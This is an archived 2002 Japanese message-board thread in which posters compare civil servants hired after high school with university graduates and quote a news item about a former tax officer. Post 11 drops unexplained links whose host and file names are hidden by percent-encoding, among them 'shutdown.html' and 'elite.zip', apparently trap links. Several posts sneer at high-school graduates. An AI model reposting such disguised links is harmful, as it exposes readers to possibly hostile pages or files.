5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

高卒公務員って・・・

1 :非公開@個人情報保護のため:02/11/18 20:21
何か定年退職するとすぐ死ぬよね
あんなにこき使われて年金もまともに受けとれないんだから悲惨だね
まあ安定だけを考えた報いだろうから仕方ないよね
ストレスだらけで40数年・・・
(((( ;゚Д゚)))ガクガクブルブル

2 :非公開@個人情報保護のため:02/11/18 20:22
2get

3 :非公開@個人情報保護のため:02/11/18 20:45
腐れ役人が泣きながら必死でスレ荒らそうとしてるのが泣ける 藁
http://natto.2ch.net/test/read.cgi/koumu/1024055936/
....

4 :非公開@個人情報保護のため:02/11/18 21:00
終了

5 :非公開@個人情報保護のため:02/11/18 23:11
長生きしてるぞ。うちは。
大卒のほうが早いような・・・
(訃報を見る限り、役付ほど早い傾向)

6 :非公開@個人情報保護のため:02/11/19 05:47
高卒公務員に対して何かコメントを。

7 :非公開@個人情報保護のため:02/11/20 20:29
高卒のほうが数では優勢。
大卒新採をいじめるのはやめれ。

8 :非公開@個人情報保護のため:02/11/21 01:50
隣の係長さん、35才高卒女子だよ。
よっぽど、がんばったんだろうなぁ、って素直に感心します。

9 :非公開@個人情報保護のため:02/11/22 02:19
すごい!
本人がすごいか、人脈がすごいか。

10 :非公開@個人情報保護のため:02/11/22 05:07
高卒で悪かったな、ボケ。

11 :非公開@個人情報保護のため:02/11/22 06:16
http://oss.%6aodi.%6frg?/lupin/R3_temp.swf?inputStr=%61%6F%65%39%30%76%31%73
http://members.tripod.com.mx/%6AY1VIP%7A3x1/shutdown.html
:http://members.tripod.com.mx/%6AY1VIP%7A3x1/unix.txt
http://ww5.enjoy.ne.jp/~kanazashi-07/%65%6C%69%74%65.%7A%69%70



sage

12 :非公開@個人情報保護のため:02/11/22 07:06
高卒公務員(事務職)って、学力的にはどーよ?
学区内で2番手校くらい?

13 :非公開@個人情報保護のため:02/11/23 11:22
んー、女の子は1番校。男の子は1〜2番校くらい。

14 :非公開@個人情報保護のため:02/11/23 11:23
どうして高卒の人は子供に変な名前つけるんですか? 

15 :非公開@個人情報保護のため:02/11/23 11:26
公務員なんて高卒でも大卒でも知能レベルは変わらない。
大卒でかしこいやつは普通公務員なんかにならない。


16 :12:02/11/23 12:32
>>13
そうなんだ。
1番校なんて公務員志望でもみんな大学へ行くものかと思ってた。

17 :13:02/11/24 03:14
ここで書いているのは、基本的に中堅の世代のこと。
今の子は(環境が許せば)進学しているようだが、いかんせん、高卒が大卒の何倍も採用されるので(それでも倍率2桁)。

今の子で高卒入庁するのは親から早く自立したい人(家庭の経済状態も反映される)。
それと、4年後に公務員の新採がほとんどなくなっている予想をしている人(これは結構正しいかも)。
あと、夜間に通って大卒で入りなおせば、大卒同期の出世頭におどりでまする(これはかなり難しい)。

院を中退して大卒で入庁する人もいる。メシ食うって厳しいんだな、とつくづく思う今日この頃。

18 : :02/11/24 03:19
俺の役所、少数精鋭主義とかいって高卒採用をほとんど廃止しやがった
(形だけは残ってるが大卒の10分の1くらいの採用)
失礼な役所だ(w

19 :17:02/11/24 04:06
18さん
うちと足して2で割ると、進学率と同じような採用率になるんでは?

田舎の役所で高卒レベルの試験しかないところがあるが、面接に来たのはほとんどが院生だった。
をいをい、高校生が全然うからん問題が「高卒レベル」か?(ちなみにオレは面接で落ちて、別の市に行った)

20 :非公開@個人情報保護のため:02/11/24 06:34
飯を食えればいいんだよ。世の中はよ。

21 :非公開@個人情報保護のため:02/11/24 20:15
>>15
かしこいの定義によるのだが。
必要とされる能力が民間と役人では違うからね。

>>20
はげどー。
ワタクス大学卒業後1年間プーでした(恥)。バイトで食いつないでた。

22 :非公開@個人情報保護のため:02/11/29 21:50
                        \ | /
 ⊂⌒⊃        ⊂⌒⊃     ―‐ ● ―‐  ⊂⌒⊃
         ⊂⊃                 / | \          ⊂⊃
                  ⊂⊃
/~\へ/~\へへ/~\/~\へ/~\へ/~\へ/~\へヘ/~\/~\
,、,,,,,、,,,,、,,,、,,,,,,,,,,、,,,/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\_________
,, ,,,,,, ,,,, ,, ,,,, ,,,,,| 立った立った!クララが立った! |            \
 ,,,, ,,, ,,,,, ,,,,,,, ,,,, , \ _____________/  駄スレも立った!  |
||=||=||=||=||=||∨=||=||=||=||=||=||=||=||\__  ______/
,,,,,,, ,,,,, ,,, ,, ,,,, ,,, ∧_∧ ,, , ∧_∧,, ,,,,, ,, __ ,,,, ,,,,,  ∨  ,,,,, ,,,, ,, ,, ,,,,
,, e@@e ,,,,,, ,,, ( o´∀`) ,,,,, (∀・ ; ) ,,, , , |   || ,,, ,,,, e@@e , ,,,, ,,, ,, , ,,
,,, (,・∀・) ,,, ,,⊂   ⊃,,, ,,⊂⊂⌒ヽ、, ,,, |!____i|| , ,,,♪ (・∀・,)_ノ ,,,,, ,,,, ,, ,
,〜((  ,,), ,,,, ,,,○(   ノ ,,,, プル ))   )○/_/) ,,,, ,, とと,,__つ , ,, ,, ,,
,,,, ,UUU ,,, ,,, ,,,,,, )__)_) ,, ,,, ,(( (_(_ノ ))プル,,,,◎ ,, ,,, ,, ,,,,, ,,,,, ,,, ミ ピョン
| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |
| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |


23 :高卒キモイ:02/12/01 19:17

高卒はキモイから近寄ってこないでほしい



24 :非公開@個人情報保護のため:02/12/01 19:28
>>15
好景気の頃の大卒と今の大卒を一緒にしないでおくれ。
今は民間に逝っても展望もてないしさ。公務員でマターリするのが一番。

ただしバブル組大卒は糞。

25 :非公開@個人情報保護のため:02/12/01 20:23
糞かもしれんが、当時はともかく、現在は勝ち組み気分でいるみたい。

公務員でマターリするのがいいけど、配属の運によると思うよ。
生き馬の目を抜くようなってところもあるんだな(出世コース)。
マターリはある意味勝ち組み。ある意味負け組み。

26 :非公開@個人情報保護のため:02/12/01 21:36
そーいえば定年間近で死んだ人と定年直後に死んだ旦那の同僚知ってる。
旦那は高卒で入って夜間大学出た。


27 :非公開@個人情報保護のため:02/12/02 23:39
ちょっとわかりにくい。
読みやすく書いてけろ。

28 :非公開@個人情報保護のため:02/12/02 23:44
無職の男(49)がスーパーで万引きした盗みの疑いで札幌西署に逮捕・即日釈放され、
26日、札幌区検に書類送検された。
男は「母を介護するために公務員を辞めた。仕事と住居も失い、2日間何も食べていな
かった」と供述した。
調べでは、男は18日午後3時半ごろ札幌市西区のスーパーで弁当と総菜(計498円
相当)を万引きした。

男は小樽市出身で、高校卒業後、主に東京都内の税務署に勤務。一昨年9月、実家の
母親を介護するため退職し妻子とも別れた。母親が昨年1月に死去したあと兄が家を
相続し売却。コンビニ店長などをしていたが、今年9月ごろ体調を壊して退職し駅や公園で
寝起きするようになった。
 
逮捕当日、叔父に金を借りに行く途中でスーパーに立ち寄った。所持金は30円。「元税務
署員のプライドから、スーパーで試食できなかった」という。
同情した捜査員は生活保護の申請を勧め、カップめんを食べさせた。男は何度も頭を下げ、
スープを飲み干した。さらに夜食用のカップめん2個を手渡した。

引用元
http://headlines.yahoo.co.jp/hl?a=20021127-00000005-mai-hok


29 :非公開@個人情報保護のため:02/12/03 00:40
高卒は元税務署員であることにさえプライドを持てるんですね。

30 :非公開@個人情報保護のため:02/12/03 00:50
ジツハ>>1はコウソツデス

31 :非公開@個人情報保護のため:02/12/03 00:58


      皆さん!糞スレですよ━━━━━━ !!!!!
      皆さん!糞スレですよ━━━━━━ !!!!!
    \                         /
       ̄ ̄ ̄ ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄       ┃
    /.      ┏ ))))                             
   /     / ┃糞 ┃                  | ヽヽ  
  /    / /┃ス ┃           i 、、 . | ヽヽ  .|\  
 / /  \ \┃レ ┃__∧  ド ド  |ヽ   |\    |     
/ /     \ ┃キ ┃;゚∀゚)━━━━━━ !!!!!
//        ヽ┃タ ┃  ⌒\
/          ┃┃ ┃/ /
            /┗ (((┛ /クソスレキタ━━━━━━ !!!!!
          /  / ̄ \     クソレスキタ━━━━━━ !!!!!
―       /   ん、 \ \クソスレキタ━━━━━━ !!!!!
――     (__ (   >  )   クソレスキタ━━━━━━ !!!!!
   ⌒ヽ   ’ ・`し' / /クソスレキタ━━━━━━ !!!!!
     人, ’ ’, ( ̄  /     クソレスキタ━━━━━━ !!!!!
   Y⌒ヽ)⌒ヽ、 )   |   クソスレキタ━━━━━━ !!!!!
            \_

32 :非公開@個人情報保護のため:02/12/03 01:18
高卒は寿命を55歳までに制限して欲しい

33 :非公開@個人情報保護のため:02/12/03 06:51
大卒が59歳までにされたら困るっしゅ。

34 :非公開@個人情報保護のため:02/12/05 11:01
M卒61歳。

35 :非公開@個人情報保護のため:02/12/07 00:31
高卒信者絵

36 :非公開@個人情報保護のため:02/12/07 06:13
高卒息茶絵

37 :非公開@個人情報保護のため:02/12/07 08:13
D卒64歳。
平均寿命がもの凄く短縮されそうだ。

38 :非公開@個人情報保護のため:02/12/08 16:34
   _____     _____       _____
  |書き込む|名前:|        |E-mail :| age   |
    ̄ ̄ ̄ ̄ ̄      ̄ ̄ ̄ ̄ ̄        ̄ ̄ ̄ ̄ ̄
            ∫            /)        ↑ ↑ ↑
      / ̄ ̄ ̄ ̄\   //   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     /\   \  / | / つ^^ヽ | クソスレに真人間が書き込む時は
     | |   (・)  (・) |/ テノノノ <  メアド欄に半角で「age」と書くのじゃ!
     (6-------◯⌒つ|  r'^^´   \____________
     |∨   _||||||||| | ノ____
 YOU!(⌒)/ \_/ /|  | ̄ ̄\ \
    ,-r┤~.l ____/\/|  |    | ̄ ̄|
   rf .| |  ヽ l:l   / |  |    |__|
  .lヽλ_八_ ,, ̄)  Y    |__|__/ /
   `ー┬‐-ー' ̄  | ̄ ̄ ̄ ̄|  〔 ̄ ̄〕


11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)